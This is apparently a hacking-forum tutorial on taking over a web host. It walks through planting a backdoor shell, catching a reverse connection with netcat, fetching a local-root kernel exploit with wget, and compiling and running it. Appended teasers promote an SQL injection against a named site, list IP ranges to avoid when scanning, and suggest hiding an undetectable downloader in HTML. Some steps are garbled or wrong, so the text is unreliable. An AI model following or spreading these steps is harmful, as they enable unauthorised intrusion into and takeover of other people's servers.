r00ting a webhost
Introduction: Well taking over a host isnt as easy as you may think. There is a fairly big process involved and a lot of fidiling around. Below I will show you how to execute a Local Root Exploit successfully to gain r00t-acesss 😛

Step 1. In this step we will need to backdoor the host. To do this I recommend for beginners you use a shell such as mulci shell. Remember which port you choose and make sure it is portforwarded to ensure the host can connect to you.

Step 2. Now that we have backdoored the host we will now need to connect. To do this we will need to get a tool called netcat. You can find it here (

). Locate our netcat through CMD, To do this we will do the following.

Code:
CD Pathtonetcatdirectory

nc -l -n -v -p porthere
Once we have Netcat listening we will now navigate to back connect on mulci shell, Enter our IP and port and click Connect

Step 3. Now if you have done it correctly you will have connected to the server in your CMD. To see if you did it type “who” or “whoami” to see if you have the user “root”. If you do than you have done this correctly

Step 4. Now we need to find out what kernel our box is running. Type “uname -a”. You should get something like below:

Code:
 Linux server1.host.com 2.6.17 blah blah
If you do now we need to copy the kernel version and look for an exploit. Match up the version from this site with a list of exploits.
Code:
http://th3-0utl4ws.com/localroot/

Step 5. Once we have found a exploit we will download it.

Code:
wget http://exploit.com/whatever

Step 6. Now we have the exploit we need to compile it. To do this we will use GCC. GCC means server

Code:
gcc exploitname -o outputname

Step 7. Now to execute our exploit. We will type ./exploit. Well Done, You
have now successfully r00ted your first box.

credits to watchdog

Explore More

Critical SQL Injection in Enjoy (http://www.enjoy.net.mm)

PlanetCreator reported another critical SQL injection (vulnerability) on several sites of Enjoy (http://www.enjoy.net.mm) SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer

Dangerous IP’s – Do not scan

All the below are FBI controlled Linux servers & IPs/IP-Ranges 207.60.0.0 – 207.60.255.0 The Internet Access Company207.60.2.128 – 207.60.2.255 Abacus Technology207.60.3.0 – 207.60.3.127 Mass Electric Construction Co.207.60.3.128 – 207.60.3.255 Peabody

Infection via HTML

Edit the code on what and how you need it, and yes this is detectable  in many cases, but you could insert a small FUD downloader to be  downloaded via